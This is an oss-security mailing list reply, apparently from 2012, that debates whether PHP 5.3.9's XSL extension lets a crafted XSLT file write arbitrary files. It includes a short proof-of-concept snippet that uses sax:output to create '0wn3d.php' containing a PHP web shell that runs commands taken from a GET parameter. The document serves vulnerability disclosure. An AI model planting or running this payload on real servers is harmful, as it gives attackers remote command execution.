Date: Sat, 14 Jan 2012 16:03:25 -0300 From: Ignacio Espinosa <osu@...dvis.net> To: oss-security@...ts.openwall.com Cc: Kurt Seifried <kseifried@...hat.com>, Nicolas Grégoire <nicolas.gregoire@...rri.fr> Subject: Re: CVE affected for PHP 5.3.9 ? On Fri, 13 Jan 2012 13:50:59 -0700 Kurt Seifried <kseifried@...hat.com> wrote: > [...] > Ok I'm still not clear on what the security claim is. Are you saying you > can cause arbitrary text output via XSL/XML mangling tricks? And > combined with having a script that uses something like "<sax:output > href="0wn3d.php" method="text">" you can put arbitrary text content into > this file which could then result in the file being parsed? The problem > is you'd have to write a script that does this, writes to a local file > with a file ending in .php or .shtml or whatever, in which case it's > pretty clear the script writer MEANT to do that. Again I'm still not > clear on what/how a security boundary is being crossed. How does this > elevate privileges or give you remote access that you wouldn't already > if you can upload arbitrary PHP scripts? > > You don't need to upload arbitrary php scripts to make this works. Just uploading a crafted xslt file will create (before patch) a file with arbitrary content, php code for example, as write-access is set for default. -- snip -- <sax:output href="0wn3d.php" method="text"> <xsl:value-of select="'<?php system(\$_GET["cmd"]);?>'"/> -- snip -- -- Ignacio Espinosa <osu@...dvis.net>
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.
Powered by Openwall GNU/*/Linux - Powered by OpenVZ